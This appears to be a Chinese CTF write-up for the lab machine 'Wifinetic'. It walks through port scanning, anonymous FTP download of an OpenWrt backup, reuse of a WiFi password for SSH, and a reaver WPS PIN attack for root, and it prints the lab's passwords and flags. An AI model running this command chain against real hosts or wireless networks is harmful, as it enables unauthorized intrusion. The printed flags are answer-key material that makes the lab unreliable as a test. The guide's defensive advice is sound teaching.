[Meachines] [Easy] Wifinetic FTP匿名登录+Reaver WPS PIN密码泄露权限提升
字数 1104 2025-08-29 08:30:36
Wifinetic 渗透测试教学文档:FTP匿名登录与Reaver WPS PIN漏洞利用
1. 信息收集阶段
1.1 目标识别
- 目标IP地址:10.10.11.247
- 扫描技术:使用nmap进行存活检测和端口扫描
- 发现开放端口:
- TCP 21 (FTP - vsftpd 3.0.3)
- TCP 22 (SSH - OpenSSH 8.2p1 Ubuntu)
- TCP 53 (tcpwrapped)
1.2 服务识别
nmap -Pn -sV -sC -p 21,22,53 10.10.11.247
2. FTP匿名登录利用
2.1 FTP服务分析
- 服务版本:vsftpd 3.0.3
- 允许匿名登录(FTP code 230)
- 可用文件列表:
- MigrateOpenWrt.txt (4,434字节)
- ProjectGreatMigration.pdf (2,501,210字节)
- ProjectOpenWRT.pdf (60,857字节)
- backup-OpenWrt-2023-07-26.tar (40,960字节)
- employees_wellness.pdf (52,946字节)
2.2 文件下载方法
# 方法1:使用ftp命令交互式下载
ftp 10.10.11.247
# 用户名输入anonymous,密码可为空或任意
# 方法2:使用wget批量下载
wget -r ftp://anonymous:anonymous@10.10.11.247
2.3 关键文件分析
- 解压备份文件获取无线配置:
tar -xvf backup-OpenWrt-2023-07-26.tar
cat ./etc/config/wireless
- 发现WiFi密码:
VeRyUniUqWiFIPasswrd1!
3. 初始访问
3.1 SSH登录
使用发现的密码尝试SSH登录:
ssh netadmin@10.10.11.247
- 成功获取用户权限
- 用户flag:
df32978a2541a4cb8a03ccc0fb8794ae
4. 权限提升
4.1 网络接口分析
ip a
iwconfig
发现以下接口:
- wlan0: AP(接入点)模式,关联phy0
- wlan1: 托管模式,支持P2P
- phy2/wlan2/mon0:
- wlan2: 托管模式
- mon0: 监控模式
4.2 查找特殊权限文件
getcap -r / 2>/dev/null
发现:
/usr/bin/reaver具有root执行权限
4.3 Reaver工具利用
Reaver可利用WPS PIN漏洞获取WPA/WPA2密码
执行命令:
reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1
- 获取root密码:
WhatIsRealAnDWhAtIsNot51121! - root flag:
3b787489a71d0e403687793940da1e1b
5. 漏洞总结与防御措施
5.1 发现漏洞
- FTP匿名登录漏洞
- 备份文件包含敏感信息(无线配置)
- Reaver工具配置不当(具有root权限)
- WPS PIN漏洞
5.2 防御建议
- 禁用FTP匿名登录
- 加密备份文件或限制访问权限
- 遵循最小权限原则,限制特殊权限
- 禁用WPS功能或使用强PIN码
- 定期更新系统和软件
6. 附录:完整命令序列
# 1. 扫描目标
ip='10.10.11.247'; itf='tun0'
nmap -Pn -sn "$ip"
sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf"
nmap -Pn -sV -sC -p 21,22,53 "$ip"
# 2. FTP匿名登录
ftp 10.10.11.247
# 或
wget -r ftp://anonymous:anonymous@10.10.11.247
# 3. 解压分析备份
tar -xvf backup-OpenWrt-2023-07-26.tar
cat ./etc/config/wireless
# 4. SSH登录
ssh netadmin@10.10.11.247
# 5. 权限提升
getcap -r / 2>/dev/null
reaver -i mon0 -b 02:00:00:00:00:00 -vv -c 1
通过以上步骤,我们完成了从信息收集到获取root权限的完整渗透测试过程。